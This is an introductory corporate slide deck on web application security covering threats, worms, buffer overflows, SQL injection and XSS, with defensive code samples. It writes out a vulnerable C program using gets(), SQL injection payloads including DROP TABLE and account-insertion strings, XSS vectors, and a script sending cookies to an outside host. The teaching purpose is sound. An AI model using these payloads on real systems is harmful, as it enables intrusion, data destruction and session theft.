Web application security

Date post: 10-May-2015
Upload: spanduranga
Page 1: Web application security

© 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.

Web Application Security

Sathya Narayana Panduranga

An Introduction

Page 2: Web application security

Nimda outbreak spreads worldwide (September 18, 2001)

The worm spread by:

Emailing itself as an attachment, scanning for, and then infecting, vulnerable Web servers running Microsoft's Internet Information Server software,

Copying itself to shared disk drives on networks, and

Appending JavaScript code to Web pages that will download the worm to Web surfers' PCs when they view the page.

Caused $530 million worth of damage within just the first week of the outbreak

Page 3: Web application security

CardSystems debacle (June, 2005)

In June 2005, information on a million credit cards was stolen from CardSystems through SQL injection

The inquiry revealed that the company was keeping an unencrypted log of all (40 million) credit cards it processed

The company was liquidated

Page 4: Web application security

Denial of Service Attack Takes Down Amazon, Wal-Mart (June, 2008)

Amazon.com was taken down for several hours by a distributed denial-of-service attack that struck the Web site's load-balancing system

Page 5: Web application security

ChoicePoint to Pay $15 million fine for Data Breach (Sept, 2010)

The April 2008 breach compromised the personal data of 13,750 people. For a 30-day period, an unknown hacker conducted thousands of unauthorized searches of a ChoicePoint database containing sensitive consumer information, including Social Security numbers

Page 6: Web application security

Understanding Threats

Defacement

Infiltration

Phishing

Pharming

Insider Threats

Denial of Service

Data theft / loss

Page 7: Web application security

Defacement

Online vandalism: attackers replace legitimate pages with illegitimate ones

Targeted towards political web sites

Risk of public misinformation and potential liabilities

White House website defaced by anti-NATO activists

Page 8: Web application security

Infiltration

Unauthorized parties gain access to resources of your computer system (e.g. CPUs, disk, network bandwidth)

Could gain read/write access to the back-end DB

Data integrity and confidentiality at risk

Page 9: Web application security

Phishing

Attacker sets up a spoofed site that looks real

Lures users to enter login credentials and stores them

Usually sent through an e-mail with a link to the spoofed site asking users to “verify” their account info

The links might be disguised through the click text

Disguising an evil link

Page 10: Web application security

Phishing Email

Phishing Website

Page 11: Web application security

Pharming (DNS Cache Poisoning)

Like phishing, the attacker’s goal is to get the user to enter sensitive data into a spoofed website

The attacker targets the DNS service used by the customer.

The attacker makes the DNS server translate a legitimate URL to their IP address instead, and the result gets cached, poisoning future replies as well

User wants to go to the website ‘www.nicebank.com’ and types the address in the web browser.

User’s computer queries the DNS server for the IP address of ‘www.nicebank.com’.

Since the DNS server has already been ‘poisoned’ by the attacker, it returns the IP address of the fake website to the user’s computer.

Page 13: Web application security

How Pharming is done

/etc/hosts file manipulation

DNS cache poisoning (using vulnerabilities in the DNS query protocol or in a specific DNS server)

Domain hijacking

Taking advantage of user typo errors

Page 14: Web application security

Insider Threats

Attacks carried out with cooperation of insiders

Insiders could have access to data and leak it

DB and Sys Admins usually get complete access

Malware being bundled with legitimate software

Loss of confidentiality and data

Page 15: Web application security

Denial of Service

Attacker inundates server with packets causing it to drop legitimate packets

Makes service unavailable, downtime = lost revenue

Particularly a threat for financial and e-commerce vendors

Can be automated through botnets (DDoS)

Page 16: Web application security

Data Theft or Data Loss

Several examples: BofA, ChoicePoint, VA

BofA: backup data tapes lost in transit

ChoicePoint: fraudsters queried the DB for sensitive info (SQL injection)

VA: employee took a computer with personal info home & his home was burglarized

Can lead to Identity theft (resulting in liability to the company)

Page 17: Web application security

Means

SQL Injection

JavaScript Injection

Worms

Botnets

Malware

Rootkits

Keyloggers

Trojans

Adware

Clickbots

Cross Site Scripting (XSS)

Cookie Stealing

Dictionary attack

Page 18: Web application security

Buffer Overflows

• A buffer overflow attack is a way to inject malicious code into a running program

• This way the attacker takes control of the program

Page 19: Web application security

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

int checkPassword() {
    char pass[16];
    bzero(pass, 16);                 /* Initialize */
    printf("Enter password: ");
    gets(pass);                      /* No bounds check: input longer than 16 bytes overruns pass[] */
    if (strcmp(pass, "opensesame") == 0)
        return 1;
    else
        return 0;
}

void openVault() {
    /* Opens the vault */
}

int main(void) {
    if (checkPassword()) {
        openVault();
        printf("Vault opened!");
    }
    return 0;
}
```

Page 20: Web application security

Execution stack: maintains current function state and address of return function

Stack frame: holds vars and data for function

Extra user input (> 16 chars) overwrites the return address

Attack string: the 17th-20th chars can specify the address of openVault() to bypass the check

Address can be found with source code or binary

Return-into-libc attack: jump to library functions, e.g. to run /bin/sh or cmd.exe, to gain access to a command shell (shellcode) and complete control

Page 21: Web application security

Considerations

One of the oldest and most common forms of security threats

Affects both stacks and heaps

Originally used by Nimda and Morris worms

Doesn’t affect Java/J2EE systems unless the native code used by these systems is vulnerable

Targeted vulnerability

Program not employing careful bounds checking of input parameters

Page 22: Web application security

Worms and other Malware

Worms spread across Internet through vulnerabilities in widely used software applications

History

First worm: Morris Worm (1988)

Code Red (2001)

Nimda (2001)

Blaster (2003)

SQL Slammer (2003)

Root-kits, Botnets, Spyware, other Malware

Page 23: Web application security

Worm vs Virus

Virus: a program that copies itself into other programs; could be transferred through infected disks

Rate of spread dependent on human use

Worm: a virus that uses the network to copy itself onto other computers

Worms propagate faster than viruses: a large number of computers to infect

Connecting is fast (milliseconds)

Page 24: Web application security

Anatomy of the attack

Morris Worm

Didn’t touch data but spiked network traffic by propagating (copying itself)

Exploited a buffer overflow in fingerd (Unix) and a vulnerability in sendmail debug mode

Used a dictionary of 432 frequently used passwords to log in and execute rexec and rsh

Code Red Worm

Spread rapidly across the internet and defaced the home page of infected servers

Resident only in memory, no disk writes

Exploited MS IIS server buffer overflow vulnerability

Exploited “indexing server” feature by scanning for IP addresses to connect to other IIS servers

Page 25: Web application security

Anatomy of the attack…continued

Nimda Worm

A worse form of the Code Red worm

Used multiple propagation vectors: server to server, server to client

The infected client sent emails with Nimda as payload

Blaster Worm

The infected machine would launch a DDoS attack on the Windows Update site and then shut down the machine

The DDoS attack prevented users from downloading the patch (fix)

Exploited a buffer overflow vulnerability in the Windows DCOM service

Page 26: Web application security

Other Malware

Rootkits: impostor OS tools used by the attacker to hide his tracks

Botnets: network of software robots the attacker uses to control many machines at once to launch attacks (e.g. DDoS through packet flooding, click fraud)

Spyware: software that monitors activity of a system or its users without their consent

Keyloggers: spyware that monitors user keyboard or mouse input, used to steal usernames, passwords, credit card #s, etc.

Trojan Horses: software that performs additional or different functions than advertised

Adware: shows ads to users w/o their consent

Page 27: Web application security

Targeted Vulnerabilities

Organization not having / implementing good security policies

Program not handling buffer overflow vulnerability

Program relying on unknown 3rd party component (which may be vulnerable)

Keeping all the features turned on by default

No clear password policy (users having predictable passwords)

Page 28: Web application security

Client state manipulation: Record, manipulate and replay attack

HTTP is stateless: server may send state info to the client which echoes it back in future requests

When client state is stored unencrypted, for example in hidden form fields, it can be manipulated by an attacker

The Unix curl and wget commands can be used for a record-replay attack

Server based session management with strong session ids can mitigate the problem
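Two ways of applying the mitigations on this slide, as an added example that is not part of the deck: an HMAC tag over state that must travel through the client (so an edited hidden field is detected), and a server-side store keyed by a strong random session id (the deck's preferred fix). SERVER_KEY, SessionStore and the item/price fields are assumptions.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Server-side key; in deployment it comes from configuration, never from the client.
SERVER_KEY = secrets.token_bytes(32)


def sign_state(state: dict, key: bytes = SERVER_KEY) -> str:
    """Encode client state and append an HMAC-SHA256 tag so edits are detectable."""
    payload = base64.urlsafe_b64encode(
        json.dumps(state, sort_keys=True).encode()).decode()
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_state(token: str, key: bytes = SERVER_KEY):
    """Return the state dict if the tag verifies, otherwise None."""
    try:
        payload, tag = token.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(payload.encode()))


def forge_without_key(token: str, new_state: dict) -> str:
    """What editing the hidden field amounts to: a new payload under the old tag.
    Present only to show that verify_state rejects it."""
    _, tag = token.rsplit(".", 1)
    payload = base64.urlsafe_b64encode(
        json.dumps(new_state, sort_keys=True).encode()).decode()
    return f"{payload}.{tag}"


class SessionStore:
    """Keep the state on the server and hand the client only an unguessable id;
    nothing the browser sends back can change the stored values."""

    def __init__(self):
        self._sessions = {}

    def create(self, state: dict) -> str:
        sid = secrets.token_urlsafe(32)   # 256 bits of randomness
        self._sessions[sid] = dict(state)
        return sid

    def get(self, sid: str):
        return self._sessions.get(sid)
```

Signing detects manipulation but not replay of an unmodified token, which is why the server-side store is the fuller answer to the record-and-replay attack.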

Page 29: Web application security

Client State Manipulation: JavaScript Manipulation

An evil user can just delete the JavaScript code, substitute desired parameters & submit! Could also just submit the request directly & bypass the JavaScript

Warning: Data validation or computations done by JavaScript cannot be trusted by the server

Attacker may alter the script in the HTML code to modify computations

Attacker may use JavaScript code to gain additional intelligence about the application

Must be redone on the server to verify

Page 30: Web application security

Targeted Vulnerabilities

Program not sanitizing input

Not expiring sessions

Writing sensitive information to cookies

Storing client-state un-encrypted

Not recognizing brute-force attacks

Unobfuscated JavaScript code
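To show what "recognizing brute-force attacks" looks like in practice (the dictionary attack listed under Means, and the repeated password guesses in the SQL injection walkthrough that follows), here is an added example that is not from the deck: a sliding-window detector run over constructed authentication log lines. The log format, field names and thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of an application's authentication log (not from the deck).
SAMPLE_AUTH_LOG = """\
2010-05-10T10:00:01 LOGIN_FAILED user=bob src=203.0.113.7
2010-05-10T10:00:02 LOGIN_FAILED user=bob src=203.0.113.7
2010-05-10T10:00:03 LOGIN_FAILED user=bob src=203.0.113.7
2010-05-10T10:00:04 LOGIN_FAILED user=bob src=203.0.113.7
2010-05-10T10:00:05 LOGIN_FAILED user=bob src=203.0.113.7
2010-05-10T10:00:06 LOGIN_FAILED user=bob src=203.0.113.7
2010-05-10T10:00:07 LOGIN_OK user=bob src=203.0.113.7
2010-05-10T10:00:08 LOGIN_FAILED user=alice src=198.51.100.2
2010-05-10T10:00:09 LOGIN_OK user=alice src=198.51.100.2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) LOGIN_(?P<result>FAILED|OK) user=(?P<user>\S+) src=(?P<src>\S+)$")


def find_bruteforce(log_text: str, threshold: int = 5,
                    window: timedelta = timedelta(seconds=60)) -> list:
    """Return (src, user, event) tuples. 'burst' fires once when a (src, user)
    pair accumulates `threshold` failures inside `window`; 'success_after_burst'
    fires when that pair then logs in successfully, i.e. a dictionary attack
    that probably worked and needs an incident, not just a lockout."""
    alerts = []
    failures = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    flagged = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                 # not an auth event; ignore
        ts = datetime.fromisoformat(m["ts"])
        key = (m["src"], m["user"])
        if m["result"] == "OK":
            if key in flagged:
                alerts.append((*key, "success_after_burst"))
                flagged.discard(key)
            failures[key].clear()
            continue
        q = failures[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append((*key, "burst"))
    return alerts
```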

Page 31: Web application security

SQL Injection

SQL injection attacks are an important security threat that can:

Compromise sensitive user data

Alter or damage critical data

Give an attacker unwanted access to DB

Page 32: Web application security

Attacker guesses the SQL used in the backend:

```sql
SELECT full_name, phone_number, ssn FROM userinfo WHERE email = $EMAIL;
```

Let us say the attacker knows a valid email id ‘[email protected]’. He tries to find out if the application has a SQL injection vulnerability by sending an input that makes the application run:

```sql
SELECT userid FROM userinfo WHERE email = '[email protected]'';
```

The error message is a sure-shot giveaway of the SQL injection vulnerability

Inject SQL to return every row in the table:

```sql
SELECT userid FROM userinfo WHERE email = 'anything' OR 'x'='x';
```

The clause is guaranteed to be true

Page 33: Web application security

Attacker wants to find out the field names:

```sql
SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; --';
```

If he gets a server error, it means the SQL is malformed and a syntax error was thrown: most likely due to a bad field name.

If he gets any kind of valid response, he guessed the name correctly.

Finding the table name:

```sql
SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';
```

If he gets any kind of valid response, he guessed the name correctly.

If the password is stored in clear text: brute-force break-in

```sql
SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = '[email protected]' AND passwd = 'hello123';
```

Tries multiple times with different common passwords until he breaks in

Page 34: Web application security

If the DB is not read-only:

```sql
SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x'; DROP TABLE userinfo; --';
```

Adding a malicious user:

```sql
SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x'; INSERT INTO userinfo ('email','passwd','login_id','full_name') VALUES ('[email protected]','hello','evil','Evil User');--';
```

Malicious password recovery:

```sql
SELECT email, passwd, login_id, full_name FROM userinfo WHERE email = 'x'; UPDATE userinfo SET email = '[email protected]' WHERE email = '[email protected]';
```

Let's say the application provides an “I lost my password” link which emails the password, and let's say the attacker clicks on it:

-----------------------------------------------------
From: [email protected]
To: [email protected]
Subject: Intranet login

This email is in response to your request for your Intranet log in information.
Your User ID is: bob
Your password is: hello
--------------------------------------------------
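The walkthrough above, reproduced against a constructed in-memory SQLite table so the difference between concatenated and parameterized SQL can be seen directly; this is an added example, not code from the deck. The table contents, the helper names and the choice of the sqlite3 driver are assumptions.

```python
import sqlite3

# Constructed rows standing in for the deck's userinfo table (not real data).
SAMPLE_USERS = [
    ("alice@example.com", "Alice Example", "555-0100", "111-11-1111"),
    ("bob@example.com", "Bob Example", "555-0101", "222-22-2222"),
]


def make_db() -> sqlite3.Connection:
    """In-memory userinfo table with the columns the deck's query selects."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo "
                 "(email TEXT, full_name TEXT, phone_number TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO userinfo VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    """The deck's query with $EMAIL pasted into the SQL text: the input can
    close the quoted literal and append its own clauses."""
    sql = ("SELECT full_name, phone_number, ssn FROM userinfo "
           f"WHERE email = '{email}'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, email: str) -> list:
    """Same query with a bound parameter: the driver passes the input as a
    value, so quotes and OR inside it are just characters to compare against."""
    sql = "SELECT full_name, phone_number, ssn FROM userinfo WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


def leaks_sql_error(conn: sqlite3.Connection, email: str) -> bool:
    """True if the concatenated query fails to parse for this input. The deck's
    probe depends on that error reaching the user; the defensive takeaway is to
    log such errors server-side and return only a generic message."""
    try:
        lookup_vulnerable(conn, email)
        return False
    except sqlite3.OperationalError:
        return True


def demo() -> dict:
    """Row counts for the deck's tautology against both query styles."""
    conn = make_db()
    tautology = "anything' OR 'x'='x"   # the slide's payload, minus the outer quotes
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, tautology)),
        "parameterized_rows": len(lookup_parameterized(conn, tautology)),
        "normal_rows": len(lookup_parameterized(conn, "alice@example.com")),
    }
```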

Page 35: Web application security

Targeted Vulnerabilities

Program not sanitizing inputs

Program not using appropriate privilege levels for accessing database

Program not validating the input source

Storing clear text passwords

Having guessable table and field names

Page 36: Web application security

Cross Site Scripting (XSS) Attacks

Security issues arising from the browser interacting with multiple web apps (ours and malicious ones), not direct attacks

Cross-Site Request Forgery (XSRF)

Cross-Site Script Inclusion (XSSI)

Cross-Site Scripting (XSS)

Page 37: Web application security

The following JSP code reads the employee id from the HTTP request and displays it to the user:

```jsp
<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>
```

This code is vulnerable to JavaScript injection and thus vulnerable to XSS

Try injecting the following script into the vulnerable website:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

The above vulnerability is called a non-persistent XSS vulnerability

```jsp
<%
...
rs = stmt.executeQuery("select * from emp where id=" + eid);
...
String name = rs.getString("name");
%>
Employee Name: <%= name %>
```

The above code has a persistent XSS vulnerability: the name comes from the database, so a script stored there is served to every user who views the page

Page 38: Web application security

Cookie grabbing: execute the following code on the vulnerable website

<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>">

Various ways of injecting javascript

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

Page 39: Web application security

XSS

Attacker can get a malicious script executed in our application’s context

Malicious script could cause the browser to send the attacker all cookies for our app’s domain

```html
<script>
  i = new Image();
  i.src = "http://www.hackerhome.org/log_cookie?cookie=" + escape(document.cookie); // URL-encode
</script>
```

The above script, injected to execute in our domain, can access document.cookie in the DOM

It constructs a URL on the attacker’s server; the request gets saved in a log file, from which the attacker can extract info from the cookie parameter
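An added example, not from the deck, showing the defensive side of the last three slides: output encoding of the echoed employee id, tried against the slide's probe, and a session cookie marked HttpOnly so that document.cookie no longer exposes the session id to an injected script. The render helpers, the cookie name JSESSIONID and the script-tag check are assumptions.

```python
import html
import re
from http.cookies import SimpleCookie

# The reflected-XSS probe from the slide, copied here as a constructed input.
XSS_PROBE = '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">'


def render_vulnerable(eid: str) -> str:
    """Mirrors the JSP '<%= eid %>': the request parameter lands in the HTML unchanged."""
    return f"<p>Employee ID: {eid}</p>"


def render_escaped(eid: str) -> str:
    """Same page with output encoding: <, >, &, and quotes become entities, so the
    browser shows the probe as text instead of parsing it as markup."""
    return f"<p>Employee ID: {html.escape(eid, quote=True)}</p>"


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to contrast the two renderers; it is not a sanitizer."""
    return SCRIPT_TAG.search(markup) is not None


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value with HttpOnly, so script in the page cannot read the session
    id through document.cookie, and Secure, so it travels only over HTTPS."""
    jar = SimpleCookie()
    jar["JSESSIONID"] = session_id
    jar["JSESSIONID"]["httponly"] = True
    jar["JSESSIONID"]["secure"] = True
    jar["JSESSIONID"]["path"] = "/"
    return jar.output(header="").strip()
```

HttpOnly removes the cookie from the script's reach; it does not fix the injection itself, which is what the output encoding is for.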

Page 40: Web application security

Sources of untrusted data

Query parameters, HTML form fields

Path of the URI, which could be inserted into a page via a “Document not found” error

Cookies, parts of the HTTP request header (e.g. Referer header)

Data inserted into a SQL DB, file system

3rd party data (e.g. RSS feed)

Page 41: Web application security

Securing the Enterprise

Physical Security

Technological Security

Application Security

Operating System Security

Network Security

Policies and Procedures

Page 42: Web application security

Next Presentation

Brief discussion on 360 degree security

Fundamental Security Concepts

Security Design Principles

Best Practices and Solutions

Testing for Security (Being the hacker)

Security breach detection and mitigation

Tools

Ariba Buyer security assessment
